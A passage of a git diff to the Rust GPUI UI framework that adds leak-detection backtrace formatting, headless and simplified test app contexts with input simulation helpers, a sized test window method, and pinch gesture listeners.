writeln!( + out, + "Leaked handle for entity {} ({entity_id:?}): (export LEAK_BACKTRACE to find allocation site)", + data.type_name + ) + .unwrap(); + } + } + } + panic!("Exited with leaked handles:\n{out}"); + } +} + +#[cfg(any(test, feature = 
"leak-detection"))] +struct BacktraceFormatter(backtrace::Backtrace); + +#[cfg(any(test, feature = "leak-detection"))] +impl fmt::Debug for BacktraceFormatter { + fn fmt(&self, fmt: &mut fmt::Formatter<'_>) -> fmt::Result { + use backtrace::{BacktraceFmt, BytesOrWideString, PrintFmt}; + + let style = if fmt.alternate() { + PrintFmt::Full + } else { + PrintFmt::Short + }; + + // When printing paths we try to strip the cwd if it exists, otherwise + // we just print the path as-is. Note that we also only do this for the + // short format, because if it's full we presumably want to print + // everything. + let cwd = std::env::current_dir(); + let mut print_path = move |fmt: &mut fmt::Formatter<'_>, path: BytesOrWideString<'_>| { + let path = path.into_path_buf(); + if style != PrintFmt::Full { + if let Ok(cwd) = &cwd { + if let Ok(suffix) = path.strip_prefix(cwd) { + return fmt::Display::fmt(&suffix.display(), fmt); + } + } + } + fmt::Display::fmt(&path.display(), fmt) + }; + + let mut f = BacktraceFmt::new(fmt, style, &mut print_path); + f.add_context()?; + let mut strip = true; + for frame in self.0.frames() { + if let [symbol, ..] 
= frame.symbols() + && let Some(name) = symbol.name() + && let Some(filename) = name.as_str() + { + match filename { + "test::run_test_in_process" + | "scheduler::executor::spawn_local_with_source_location::impl$1::poll > > > >,alloc::alloc::Global> > >" => { + strip = true + } + "gpui::app::entity_map::LeakDetector::handle_created" => { + strip = false; + continue; + } + "zed::main" => { + strip = true; + f.frame().backtrace_frame(frame)?; + } + _ => {} + } + } + if strip { + continue; + } + f.frame().backtrace_frame(frame)?; + } + f.finish()?; + Ok(()) + } +} + #[cfg(test)] mod test { use crate::EntityMap; @@ -1007,4 +1238,42 @@ mod test { vec![1], ); } + + #[test] + fn test_leak_detector_snapshot_no_leaks() { + let mut entity_map = EntityMap::new(); + + let slot = entity_map.reserve::(); + let pre_existing = entity_map.insert(slot, TestEntity { i: 1 }); + + let snapshot = entity_map.leak_detector_snapshot(); + + let slot = entity_map.reserve::(); + let temporary = entity_map.insert(slot, TestEntity { i: 2 }); + drop(temporary); + + entity_map.assert_no_new_leaks(&snapshot); + + drop(pre_existing); + } + + #[test] + #[should_panic(expected = "New entity leaks detected since snapshot")] + fn test_leak_detector_snapshot_detects_new_leak() { + let mut entity_map = EntityMap::new(); + + let slot = entity_map.reserve::(); + let pre_existing = entity_map.insert(slot, TestEntity { i: 1 }); + + let snapshot = entity_map.leak_detector_snapshot(); + + let slot = entity_map.reserve::(); + let leaked = entity_map.insert(slot, TestEntity { i: 2 }); + + // `leaked` is still alive, so this should panic. 
+ entity_map.assert_no_new_leaks(&snapshot); + + drop(pre_existing); + drop(leaked); + } } diff --git a/crates/gpui/src/app/headless_app_context.rs b/crates/gpui/src/app/headless_app_context.rs new file mode 100644 index 0000000000000000000000000000000000000000..90dc8c8f0c0994e3f118916b2d004f7d90566ea7 --- /dev/null +++ b/crates/gpui/src/app/headless_app_context.rs @@ -0,0 +1,275 @@ +//! Cross-platform headless app context for tests that need real text shaping. +//! +//! This replaces the macOS-only `HeadlessMetalAppContext` with a platform-neutral +//! implementation backed by `TestPlatform`. Tests supply a real `PlatformTextSystem` +//! (e.g. `DirectWriteTextSystem` on Windows, `MacTextSystem` on macOS) to get +//! accurate glyph measurements while keeping everything else deterministic. +//! +//! Optionally, a renderer factory can be provided to enable real GPU rendering +//! and screenshot capture via [`HeadlessAppContext::capture_screenshot`]. + +use crate::{ + AnyView, AnyWindowHandle, App, AppCell, AppContext, AssetSource, BackgroundExecutor, Bounds, + Context, Entity, ForegroundExecutor, Global, Pixels, PlatformHeadlessRenderer, + PlatformTextSystem, Render, Reservation, Size, Task, TestDispatcher, TestPlatform, TextSystem, + Window, WindowBounds, WindowHandle, WindowOptions, + app::{GpuiBorrow, GpuiMode}, +}; +use anyhow::Result; +use image::RgbaImage; +use std::{future::Future, rc::Rc, sync::Arc, time::Duration}; + +/// A cross-platform headless app context for tests that need real text shaping. +/// +/// Unlike the old `HeadlessMetalAppContext`, this works on any platform. It uses +/// `TestPlatform` for deterministic scheduling and accepts a pluggable +/// `PlatformTextSystem` so tests get real glyph measurements. 
+/// +/// # Usage +/// +/// ```ignore +/// let text_system = Arc::new(gpui_wgpu::CosmicTextSystem::new("fallback")); +/// let mut cx = HeadlessAppContext::with_platform( +/// text_system, +/// Arc::new(Assets), +/// || gpui_platform::current_headless_renderer(), +/// ); +/// ``` +pub struct HeadlessAppContext { + /// The underlying app cell. + pub app: Rc, + /// The background executor for running async tasks. + pub background_executor: BackgroundExecutor, + /// The foreground executor for running tasks on the main thread. + pub foreground_executor: ForegroundExecutor, + dispatcher: TestDispatcher, + text_system: Arc, +} + +impl HeadlessAppContext { + /// Creates a new headless app context with the given text system. + pub fn new(platform_text_system: Arc) -> Self { + Self::with_platform(platform_text_system, Arc::new(()), || None) + } + + /// Creates a new headless app context with a custom text system and asset source. + pub fn with_asset_source( + platform_text_system: Arc, + asset_source: Arc, + ) -> Self { + Self::with_platform(platform_text_system, asset_source, || None) + } + + /// Creates a new headless app context with the given text system, asset source, + /// and an optional renderer factory for screenshot support. 
+ pub fn with_platform( + platform_text_system: Arc, + asset_source: Arc, + renderer_factory: impl Fn() -> Option> + 'static, + ) -> Self { + let seed = std::env::var("SEED") + .ok() + .and_then(|s| s.parse().ok()) + .unwrap_or(0); + + let dispatcher = TestDispatcher::new(seed); + let arc_dispatcher = Arc::new(dispatcher.clone()); + let background_executor = BackgroundExecutor::new(arc_dispatcher.clone()); + let foreground_executor = ForegroundExecutor::new(arc_dispatcher); + + let renderer_factory: Box Option>> = + Box::new(renderer_factory); + let platform = TestPlatform::with_platform( + background_executor.clone(), + foreground_executor.clone(), + platform_text_system.clone(), + Some(renderer_factory), + ); + + let text_system = Arc::new(TextSystem::new(platform_text_system)); + let http_client = http_client::FakeHttpClient::with_404_response(); + let app = App::new_app(platform, asset_source, http_client); + app.borrow_mut().mode = GpuiMode::test(); + + Self { + app, + background_executor, + foreground_executor, + dispatcher, + text_system, + } + } + + /// Opens a window for headless rendering. + pub fn open_window( + &mut self, + size: Size, + build_root: impl FnOnce(&mut Window, &mut App) -> Entity, + ) -> Result> { + use crate::{point, px}; + + let bounds = Bounds { + origin: point(px(0.0), px(0.0)), + size, + }; + + let mut cx = self.app.borrow_mut(); + cx.open_window( + WindowOptions { + window_bounds: Some(WindowBounds::Windowed(bounds)), + focus: false, + show: false, + ..Default::default() + }, + build_root, + ) + } + + /// Runs all pending tasks until parked. + pub fn run_until_parked(&self) { + self.dispatcher.run_until_parked(); + } + + /// Advances the simulated clock. + pub fn advance_clock(&self, duration: Duration) { + self.dispatcher.advance_clock(duration); + } + + /// Enables parking mode, allowing blocking on real I/O (e.g., async asset loading). 
+ pub fn allow_parking(&self) { + self.dispatcher.allow_parking(); + } + + /// Disables parking mode, returning to deterministic test execution. + pub fn forbid_parking(&self) { + self.dispatcher.forbid_parking(); + } + + /// Updates app state. + pub fn update(&mut self, f: impl FnOnce(&mut App) -> R) -> R { + let mut app = self.app.borrow_mut(); + f(&mut app) + } + + /// Updates a window and calls draw to render. + pub fn update_window( + &mut self, + window: AnyWindowHandle, + f: impl FnOnce(AnyView, &mut Window, &mut App) -> R, + ) -> Result { + let mut app = self.app.borrow_mut(); + app.update_window(window, f) + } + + /// Captures a screenshot from a window. + /// + /// Requires that the context was created with a renderer factory that + /// returns `Some` via [`HeadlessAppContext::with_platform`]. + pub fn capture_screenshot(&mut self, window: AnyWindowHandle) -> Result { + let mut app = self.app.borrow_mut(); + app.update_window(window, |_, window, _| window.render_to_image())? + } + + /// Returns the text system. + pub fn text_system(&self) -> &Arc { + &self.text_system + } + + /// Returns the background executor. + pub fn background_executor(&self) -> &BackgroundExecutor { + &self.background_executor + } + + /// Returns the foreground executor. + pub fn foreground_executor(&self) -> &ForegroundExecutor { + &self.foreground_executor + } +} + +impl Drop for HeadlessAppContext { + fn drop(&mut self) { + // Shut down the app so windows are closed and entity handles are + // released before the LeakDetector runs. 
+ self.app.borrow_mut().shutdown(); + } +} + +impl AppContext for HeadlessAppContext { + fn new(&mut self, build_entity: impl FnOnce(&mut Context) -> T) -> Entity { + let mut app = self.app.borrow_mut(); + app.new(build_entity) + } + + fn reserve_entity(&mut self) -> Reservation { + let mut app = self.app.borrow_mut(); + app.reserve_entity() + } + + fn insert_entity( + &mut self, + reservation: Reservation, + build_entity: impl FnOnce(&mut Context) -> T, + ) -> Entity { + let mut app = self.app.borrow_mut(); + app.insert_entity(reservation, build_entity) + } + + fn update_entity( + &mut self, + handle: &Entity, + update: impl FnOnce(&mut T, &mut Context) -> R, + ) -> R { + let mut app = self.app.borrow_mut(); + app.update_entity(handle, update) + } + + fn as_mut<'a, T>(&'a mut self, _: &Entity) -> GpuiBorrow<'a, T> + where + T: 'static, + { + panic!("Cannot use as_mut with HeadlessAppContext. Call update() instead.") + } + + fn read_entity(&self, handle: &Entity, read: impl FnOnce(&T, &App) -> R) -> R + where + T: 'static, + { + let app = self.app.borrow(); + app.read_entity(handle, read) + } + + fn update_window(&mut self, window: AnyWindowHandle, f: F) -> Result + where + F: FnOnce(AnyView, &mut Window, &mut App) -> T, + { + let mut lock = self.app.borrow_mut(); + lock.update_window(window, f) + } + + fn read_window( + &self, + window: &WindowHandle, + read: impl FnOnce(Entity, &App) -> R, + ) -> Result + where + T: 'static, + { + let app = self.app.borrow(); + app.read_window(window, read) + } + + fn background_spawn(&self, future: impl Future + Send + 'static) -> Task + where + R: Send + 'static, + { + self.background_executor.spawn(future) + } + + fn read_global(&self, callback: impl FnOnce(&G, &App) -> R) -> R + where + G: Global, + { + let app = self.app.borrow(); + app.read_global(callback) + } +} diff --git a/crates/gpui/src/app/test_app.rs b/crates/gpui/src/app/test_app.rs new file mode 100644 index 
0000000000000000000000000000000000000000..268fa891b563289b85195097d27e06d0b3e15680 --- /dev/null +++ b/crates/gpui/src/app/test_app.rs @@ -0,0 +1,607 @@ +//! A clean testing API for GPUI applications. +//! +//! `TestApp` provides a simpler alternative to `TestAppContext` with: +//! - Automatic effect flushing after updates +//! - Clean window creation and inspection +//! - Input simulation helpers +//! +//! # Example +//! ```ignore +//! #[test] +//! fn test_my_view() { +//! let mut app = TestApp::new(); +//! +//! let mut window = app.open_window(|window, cx| { +//! MyView::new(window, cx) +//! }); +//! +//! window.update(|view, window, cx| { +//! view.do_something(cx); +//! }); +//! +//! // Check rendered state +//! assert_eq!(window.title(), Some("Expected Title")); +//! } +//! ``` + +use crate::{ + AnyWindowHandle, App, AppCell, AppContext, AsyncApp, BackgroundExecutor, BorrowAppContext, + Bounds, ClipboardItem, Context, Entity, ForegroundExecutor, Global, InputEvent, Keystroke, + MouseButton, MouseDownEvent, MouseMoveEvent, MouseUpEvent, Pixels, Platform, + PlatformTextSystem, Point, Render, Size, Task, TestDispatcher, TestPlatform, TextSystem, + Window, WindowBounds, WindowHandle, WindowOptions, app::GpuiMode, +}; +use std::{future::Future, rc::Rc, sync::Arc, time::Duration}; + +/// A test application context with a clean API. +/// +/// Unlike `TestAppContext`, `TestApp` automatically flushes effects after +/// each update and provides simpler window management. +pub struct TestApp { + app: Rc, + platform: Rc, + background_executor: BackgroundExecutor, + foreground_executor: ForegroundExecutor, + #[allow(dead_code)] + dispatcher: TestDispatcher, + text_system: Arc, +} + +impl TestApp { + /// Create a new test application. + pub fn new() -> Self { + Self::with_seed(0) + } + + /// Create a new test application with a specific random seed. 
+ pub fn with_seed(seed: u64) -> Self { + Self::build(seed, None, Arc::new(())) + } + + /// Create a new test application with a custom text system for real font shaping. + pub fn with_text_system(text_system: Arc) -> Self { + Self::build(0, Some(text_system), Arc::new(())) + } + + /// Create a new test application with a custom text system and asset source. + pub fn with_text_system_and_assets( + text_system: Arc, + asset_source: Arc, + ) -> Self { + Self::build(0, Some(text_system), asset_source) + } + + fn build( + seed: u64, + platform_text_system: Option>, + asset_source: Arc, + ) -> Self { + let dispatcher = TestDispatcher::new(seed); + let arc_dispatcher = Arc::new(dispatcher.clone()); + let background_executor = BackgroundExecutor::new(arc_dispatcher.clone()); + let foreground_executor = ForegroundExecutor::new(arc_dispatcher); + let platform = match platform_text_system.clone() { + Some(ts) => TestPlatform::with_text_system( + background_executor.clone(), + foreground_executor.clone(), + ts, + ), + None => TestPlatform::new(background_executor.clone(), foreground_executor.clone()), + }; + let http_client = http_client::FakeHttpClient::with_404_response(); + let text_system = Arc::new(TextSystem::new( + platform_text_system.unwrap_or_else(|| platform.text_system.clone()), + )); + + let app = App::new_app(platform.clone(), asset_source, http_client); + app.borrow_mut().mode = GpuiMode::test(); + + Self { + app, + platform, + background_executor, + foreground_executor, + dispatcher, + text_system, + } + } + + /// Run a closure with mutable access to the App context. + /// Automatically runs until parked after the closure completes. + pub fn update(&mut self, f: impl FnOnce(&mut App) -> R) -> R { + let result = { + let mut app = self.app.borrow_mut(); + app.update(f) + }; + self.run_until_parked(); + result + } + + /// Run a closure with read-only access to the App context. 
+ pub fn read(&self, f: impl FnOnce(&App) -> R) -> R { + let app = self.app.borrow(); + f(&app) + } + + /// Create a new entity in the app. + pub fn new_entity( + &mut self, + build: impl FnOnce(&mut Context) -> T, + ) -> Entity { + self.update(|cx| cx.new(build)) + } + + /// Update an entity. + pub fn update_entity( + &mut self, + entity: &Entity, + f: impl FnOnce(&mut T, &mut Context) -> R, + ) -> R { + self.update(|cx| entity.update(cx, f)) + } + + /// Read an entity. + pub fn read_entity( + &self, + entity: &Entity, + f: impl FnOnce(&T, &App) -> R, + ) -> R { + self.read(|cx| f(entity.read(cx), cx)) + } + + /// Open a test window with the given root view, using maximized bounds. + pub fn open_window( + &mut self, + build_view: impl FnOnce(&mut Window, &mut Context) -> V, + ) -> TestAppWindow { + let bounds = self.read(|cx| Bounds::maximized(None, cx)); + let handle = self.update(|cx| { + cx.open_window( + WindowOptions { + window_bounds: Some(WindowBounds::Windowed(bounds)), + ..Default::default() + }, + |window, cx| cx.new(|cx| build_view(window, cx)), + ) + .unwrap() + }); + + TestAppWindow { + handle, + app: self.app.clone(), + platform: self.platform.clone(), + background_executor: self.background_executor.clone(), + } + } + + /// Open a test window with specific options. + pub fn open_window_with_options( + &mut self, + options: WindowOptions, + build_view: impl FnOnce(&mut Window, &mut Context) -> V, + ) -> TestAppWindow { + let handle = self.update(|cx| { + cx.open_window(options, |window, cx| cx.new(|cx| build_view(window, cx))) + .unwrap() + }); + + TestAppWindow { + handle, + app: self.app.clone(), + platform: self.platform.clone(), + background_executor: self.background_executor.clone(), + } + } + + /// Run pending tasks until there's nothing left to do. + pub fn run_until_parked(&self) { + self.background_executor.run_until_parked(); + } + + /// Advance the simulated clock by the given duration. 
+ pub fn advance_clock(&self, duration: Duration) { + self.background_executor.advance_clock(duration); + } + + /// Spawn a future on the foreground executor. + pub fn spawn(&self, f: impl FnOnce(AsyncApp) -> Fut) -> Task + where + Fut: Future + 'static, + R: 'static, + { + self.foreground_executor.spawn(f(self.to_async())) + } + + /// Spawn a future on the background executor. + pub fn background_spawn(&self, future: impl Future + Send + 'static) -> Task + where + R: Send + 'static, + { + self.background_executor.spawn(future) + } + + /// Get an async handle to the app. + pub fn to_async(&self) -> AsyncApp { + AsyncApp { + app: Rc::downgrade(&self.app), + background_executor: self.background_executor.clone(), + foreground_executor: self.foreground_executor.clone(), + } + } + + /// Get the background executor. + pub fn background_executor(&self) -> &BackgroundExecutor { + &self.background_executor + } + + /// Get the foreground executor. + pub fn foreground_executor(&self) -> &ForegroundExecutor { + &self.foreground_executor + } + + /// Get the text system. + pub fn text_system(&self) -> &Arc { + &self.text_system + } + + /// Check if a global of the given type exists. + pub fn has_global(&self) -> bool { + self.read(|cx| cx.has_global::()) + } + + /// Set a global value. + pub fn set_global(&mut self, global: G) { + self.update(|cx| cx.set_global(global)); + } + + /// Read a global value. + pub fn read_global(&self, f: impl FnOnce(&G, &App) -> R) -> R { + self.read(|cx| f(cx.global(), cx)) + } + + /// Update a global value. + pub fn update_global(&mut self, f: impl FnOnce(&mut G, &mut App) -> R) -> R { + self.update(|cx| cx.update_global(f)) + } + + // Platform simulation methods + + /// Write text to the simulated clipboard. + pub fn write_to_clipboard(&self, item: ClipboardItem) { + self.platform.write_to_clipboard(item); + } + + /// Read from the simulated clipboard. 
+ pub fn read_from_clipboard(&self) -> Option { + self.platform.read_from_clipboard() + } + + /// Get URLs that have been opened via `cx.open_url()`. + pub fn opened_url(&self) -> Option { + self.platform.opened_url.borrow().clone() + } + + /// Check if a file path prompt is pending. + pub fn did_prompt_for_new_path(&self) -> bool { + self.platform.did_prompt_for_new_path() + } + + /// Simulate answering a path selection dialog. + pub fn simulate_new_path_selection( + &self, + select: impl FnOnce(&std::path::Path) -> Option, + ) { + self.platform.simulate_new_path_selection(select); + } + + /// Check if a prompt dialog is pending. + pub fn has_pending_prompt(&self) -> bool { + self.platform.has_pending_prompt() + } + + /// Simulate answering a prompt dialog. + pub fn simulate_prompt_answer(&self, button: &str) { + self.platform.simulate_prompt_answer(button); + } + + /// Get all open windows. + pub fn windows(&self) -> Vec { + self.read(|cx| cx.windows()) + } +} + +impl Default for TestApp { + fn default() -> Self { + Self::new() + } +} + +/// A test window with inspection and simulation capabilities. +pub struct TestAppWindow { + handle: WindowHandle, + app: Rc, + platform: Rc, + background_executor: BackgroundExecutor, +} + +impl TestAppWindow { + /// Get the window handle. + pub fn handle(&self) -> WindowHandle { + self.handle + } + + /// Get the root view entity. + pub fn root(&self) -> Entity { + let mut app = self.app.borrow_mut(); + let any_handle: AnyWindowHandle = self.handle.into(); + app.update_window(any_handle, |root_view, _, _| { + root_view.downcast::().expect("root view type mismatch") + }) + .expect("window not found") + } + + /// Update the root view. 
+ pub fn update(&mut self, f: impl FnOnce(&mut V, &mut Window, &mut Context) -> R) -> R { + let result = { + let mut app = self.app.borrow_mut(); + let any_handle: AnyWindowHandle = self.handle.into(); + app.update_window(any_handle, |root_view, window, cx| { + let view = root_view.downcast::().expect("root view type mismatch"); + view.update(cx, |view, cx| f(view, window, cx)) + }) + .expect("window not found") + }; + self.background_executor.run_until_parked(); + result + } + + /// Read the root view. + pub fn read(&self, f: impl FnOnce(&V, &App) -> R) -> R { + let app = self.app.borrow(); + let view = self + .app + .borrow() + .windows + .get(self.handle.window_id()) + .and_then(|w| w.as_ref()) + .and_then(|w| w.root.clone()) + .and_then(|r| r.downcast::().ok()) + .expect("window or root view not found"); + f(view.read(&app), &app) + } + + /// Get the window title. + pub fn title(&self) -> Option { + let app = self.app.borrow(); + app.read_window(&self.handle, |_, _cx| { + // TODO: expose title through Window API + None + }) + .unwrap() + } + + /// Simulate a keystroke. + pub fn simulate_keystroke(&mut self, keystroke: &str) { + let keystroke = Keystroke::parse(keystroke).unwrap(); + { + let mut app = self.app.borrow_mut(); + let any_handle: AnyWindowHandle = self.handle.into(); + app.update_window(any_handle, |_, window, cx| { + window.dispatch_keystroke(keystroke, cx); + }) + .unwrap(); + } + self.background_executor.run_until_parked(); + } + + /// Simulate multiple keystrokes (space-separated). + pub fn simulate_keystrokes(&mut self, keystrokes: &str) { + for keystroke in keystrokes.split(' ') { + self.simulate_keystroke(keystroke); + } + } + + /// Simulate typing text. + pub fn simulate_input(&mut self, input: &str) { + for char in input.chars() { + self.simulate_keystroke(&char.to_string()); + } + } + + /// Simulate a mouse move. 
+ pub fn simulate_mouse_move(&mut self, position: Point) { + self.simulate_event(MouseMoveEvent { + position, + modifiers: Default::default(), + pressed_button: None, + }); + } + + /// Simulate a mouse down event. + pub fn simulate_mouse_down(&mut self, position: Point, button: MouseButton) { + self.simulate_event(MouseDownEvent { + position, + button, + modifiers: Default::default(), + click_count: 1, + first_mouse: false, + }); + } + + /// Simulate a mouse up event. + pub fn simulate_mouse_up(&mut self, position: Point, button: MouseButton) { + self.simulate_event(MouseUpEvent { + position, + button, + modifiers: Default::default(), + click_count: 1, + }); + } + + /// Simulate a click at the given position. + pub fn simulate_click(&mut self, position: Point, button: MouseButton) { + self.simulate_mouse_down(position, button); + self.simulate_mouse_up(position, button); + } + + /// Simulate a scroll event. + pub fn simulate_scroll(&mut self, position: Point, delta: Point) { + self.simulate_event(crate::ScrollWheelEvent { + position, + delta: crate::ScrollDelta::Pixels(delta), + modifiers: Default::default(), + touch_phase: crate::TouchPhase::Moved, + }); + } + + /// Simulate an input event. + pub fn simulate_event(&mut self, event: E) { + let platform_input = event.to_platform_input(); + { + let mut app = self.app.borrow_mut(); + let any_handle: AnyWindowHandle = self.handle.into(); + app.update_window(any_handle, |_, window, cx| { + window.dispatch_event(platform_input, cx); + }) + .unwrap(); + } + self.background_executor.run_until_parked(); + } + + /// Simulate resizing the window. 
+ pub fn simulate_resize(&mut self, size: Size) { + let window_id = self.handle.window_id(); + let mut app = self.app.borrow_mut(); + if let Some(Some(window)) = app.windows.get_mut(window_id) { + if let Some(test_window) = window.platform_window.as_test() { + test_window.simulate_resize(size); + } + } + drop(app); + self.background_executor.run_until_parked(); + } + + /// Force a redraw of the window. + pub fn draw(&mut self) { + let mut app = self.app.borrow_mut(); + let any_handle: AnyWindowHandle = self.handle.into(); + app.update_window(any_handle, |_, window, cx| { + window.draw(cx).clear(); + }) + .unwrap(); + } +} + +impl Clone for TestAppWindow { + fn clone(&self) -> Self { + Self { + handle: self.handle, + app: self.app.clone(), + platform: self.platform.clone(), + background_executor: self.background_executor.clone(), + } + } +} + +#[cfg(test)] +mod tests { + use super::*; + use crate::{FocusHandle, Focusable, div, prelude::*}; + + struct Counter { + count: usize, + focus_handle: FocusHandle, + } + + impl Counter { + fn new(_window: &mut Window, cx: &mut Context) -> Self { + let focus_handle = cx.focus_handle(); + Self { + count: 0, + focus_handle, + } + } + + fn increment(&mut self, _cx: &mut Context) { + self.count += 1; + } + } + + impl Focusable for Counter { + fn focus_handle(&self, _cx: &App) -> FocusHandle { + self.focus_handle.clone() + } + } + + impl Render for Counter { + fn render(&mut self, _window: &mut Window, _cx: &mut Context) -> impl IntoElement { + div().child(format!("Count: {}", self.count)) + } + } + + #[test] + fn test_basic_usage() { + let mut app = TestApp::new(); + + let mut window = app.open_window(Counter::new); + + window.update(|counter, _window, cx| { + counter.increment(cx); + }); + + window.read(|counter, _| { + assert_eq!(counter.count, 1); + }); + + drop(window); + app.update(|cx| cx.shutdown()); + } + + #[test] + fn test_entity_creation() { + let mut app = TestApp::new(); + + let entity = app.new_entity(|cx| Counter { + 
count: 42, + focus_handle: cx.focus_handle(), + }); + + app.read_entity(&entity, |counter, _| { + assert_eq!(counter.count, 42); + }); + + app.update_entity(&entity, |counter, _cx| { + counter.count += 1; + }); + + app.read_entity(&entity, |counter, _| { + assert_eq!(counter.count, 43); + }); + } + + #[test] + fn test_globals() { + let mut app = TestApp::new(); + + struct MyGlobal(String); + impl Global for MyGlobal {} + + assert!(!app.has_global::()); + + app.set_global(MyGlobal("hello".into())); + + assert!(app.has_global::()); + + app.read_global::(|global, _| { + assert_eq!(global.0, "hello"); + }); + + app.update_global::(|global, _| { + global.0 = "world".into(); + }); + + app.read_global::(|global, _| { + assert_eq!(global.0, "world"); + }); + } +} diff --git a/crates/gpui/src/app/test_context.rs b/crates/gpui/src/app/test_context.rs index dd4f37ed2a561f4259b41241c7cf4c83790a2b2f..d8f459df3c54200f07b4584eeb8e1ffa8415554b 100644 --- a/crates/gpui/src/app/test_context.rs +++ b/crates/gpui/src/app/test_context.rs @@ -5,7 +5,7 @@ use crate::{ ModifiersChangedEvent, MouseButton, MouseDownEvent, MouseMoveEvent, MouseUpEvent, Pixels, Platform, Point, Render, Result, Size, Task, TestDispatcher, TestPlatform, TestScreenCaptureSource, TestWindow, TextSystem, VisualContext, Window, WindowBounds, - WindowHandle, WindowOptions, app::GpuiMode, + WindowHandle, WindowOptions, app::GpuiMode, window::ElementArenaScope, }; use anyhow::{anyhow, bail}; use futures::{Stream, StreamExt, channel::oneshot}; @@ -18,8 +18,6 @@ use std::{ /// an implementation of `Context` with additional methods that are useful in tests. 
#[derive(Clone)] pub struct TestAppContext { - #[doc(hidden)] - pub app: Rc, #[doc(hidden)] pub background_executor: BackgroundExecutor, #[doc(hidden)] @@ -30,6 +28,8 @@ pub struct TestAppContext { text_system: Arc, fn_name: Option<&'static str>, on_quit: Rc>>>, + #[doc(hidden)] + pub app: Rc, } impl AppContext for TestAppContext { @@ -232,6 +232,33 @@ impl TestAppContext { .unwrap() } + /// Opens a new window with a specific size. + /// + /// Unlike `add_window` which uses maximized bounds, this allows controlling + /// the window dimensions, which is important for layout-sensitive tests. + pub fn open_window( + &mut self, + window_size: Size, + build_window: F, + ) -> WindowHandle + where + F: FnOnce(&mut Window, &mut Context) -> V, + V: 'static + Render, + { + let mut cx = self.app.borrow_mut(); + cx.open_window( + WindowOptions { + window_bounds: Some(WindowBounds::Windowed(Bounds { + origin: Point::default(), + size: window_size, + })), + ..Default::default() + }, + |window, cx| cx.new(|cx| build_window(window, cx)), + ) + .unwrap() + } + /// Adds a new window with no content. pub fn add_empty_window(&mut self) -> &mut VisualTestContext { let mut cx = self.app.borrow_mut(); @@ -402,8 +429,8 @@ impl TestAppContext { } /// Wait until there are no more pending tasks. - pub fn run_until_parked(&mut self) { - self.background_executor.run_until_parked() + pub fn run_until_parked(&self) { + self.dispatcher.run_until_parked(); } /// Simulate dispatching an action to the currently focused node in the window. 
@@ -819,6 +846,8 @@ impl VisualTestContext { E: Element, { self.update(|window, cx| { + let _arena_scope = ElementArenaScope::enter(&cx.element_arena); + window.invalidator.set_phase(DrawPhase::Prepaint); let mut element = Drawable::new(f(window, cx)); element.layout_as_root(space.into(), window, cx); @@ -830,6 +859,9 @@ impl VisualTestContext { window.invalidator.set_phase(DrawPhase::None); window.refresh(); + drop(element); + cx.element_arena.borrow_mut().clear(); + (request_layout_state, prepaint_state) }) } diff --git a/crates/gpui/src/color.rs b/crates/gpui/src/color.rs index bb41a2f996e250b8c73377922f81170bb432321f..75585bcd90881513d835d28d260319d08acf9c4d 100644 --- a/crates/gpui/src/color.rs +++ b/crates/gpui/src/color.rs @@ -820,6 +820,15 @@ impl LinearColorStop { } impl Background { + /// Returns the solid color if this is a solid background, None otherwise. + pub fn as_solid(&self) -> Option { + if self.tag == BackgroundTag::Solid { + Some(self.solid) + } else { + None + } + } + /// Use specified color space for color interpolation. /// /// diff --git a/crates/gpui/src/elements/deferred.rs b/crates/gpui/src/elements/deferred.rs index 9498734198dbe58798867ebe7f20138e5667777b..25245fa4b6ea70284658bf0b91b53ca395b750dd 100644 --- a/crates/gpui/src/elements/deferred.rs +++ b/crates/gpui/src/elements/deferred.rs @@ -62,7 +62,7 @@ impl Element for Deferred { ) { let child = self.child.take().unwrap(); let element_offset = window.element_offset(); - window.defer_draw(child, element_offset, self.priority) + window.defer_draw(child, element_offset, self.priority, None) } fn paint( diff --git a/crates/gpui/src/elements/div.rs b/crates/gpui/src/elements/div.rs index 2b4a3c84e8111796bf7ce32a4c6ad83854ded6fd..bdda213dfd0f45c8d57b94bd830f966beb1c0050 100644 --- a/crates/gpui/src/elements/div.rs +++ b/crates/gpui/src/elements/div.rs @@ -15,6 +15,7 @@ //! and Tailwind-like styling that you can use to build your own custom elements. Div is //! 
constructed by combining these two systems into an all-in-one element. +use crate::PinchEvent; use crate::{ AbsoluteLength, Action, AnyDrag, AnyElement, AnyTooltip, AnyView, App, Bounds, ClickEvent, DispatchPhase, Display, Element, ElementId, Entity, FocusHandle, Global, GlobalElementId, @@ -353,6 +354,35 @@ impl Interactivity { })); } + /// Bind the given callback to pinch gesture events during the bubble phase. + /// + /// See [`Context::listener`](crate::Context::listener) to get access to a view's state from this callback. + pub fn on_pinch(&mut self, listener: impl Fn(&PinchEvent, &mut Window, &mut App) + 'static) { + self.pinch_listeners + .push(Box::new(move |event, phase, hitbox, window, cx| { + if phase == DispatchPhase::Bubble && hitbox.is_hovered(window) { + (listener)(event, window, cx); + } + })); + } + + /// Bind the given callback to pinch gesture events during the capture phase. + /// + /// See [`Context::listener`](crate::Context::listener) to get access to a view's state from this callback. + pub fn capture_pinch( + &mut self, + listener: impl Fn(&PinchEvent, &mut Window, &mut App) + 'static, + ) { + self.pinch_listeners + .push(Box::new(move |event, phase, _hitbox, window, cx| { + if phase == DispatchPhase::Capture { + (listener)(event, window, cx); + } else { + cx.propagate(); + } + })); + } + /// Bind the given callback to an action dispatch during the capture phase. /// The imperative API equivalent to [`InteractiveElement::capture_action`]. /// @@ -635,6 +665,10 @@ impl Interactivity { pub fn block_mouse_except_scroll(&mut self) { self.hitbox_behavior = HitboxBehavior::BlockMouseExceptScroll; } + + fn has_pinch_listeners(&self) -> bool { + !self.pinch_listeners.is_empty() + } } /// A trait for elements that want to use the standard GPUI event handlers that don't @@ -905,6 +939,26 @@ pub trait InteractiveElement: Sized { self } + /// Bind the given callback to pinch gesture events during the bubble phase. 
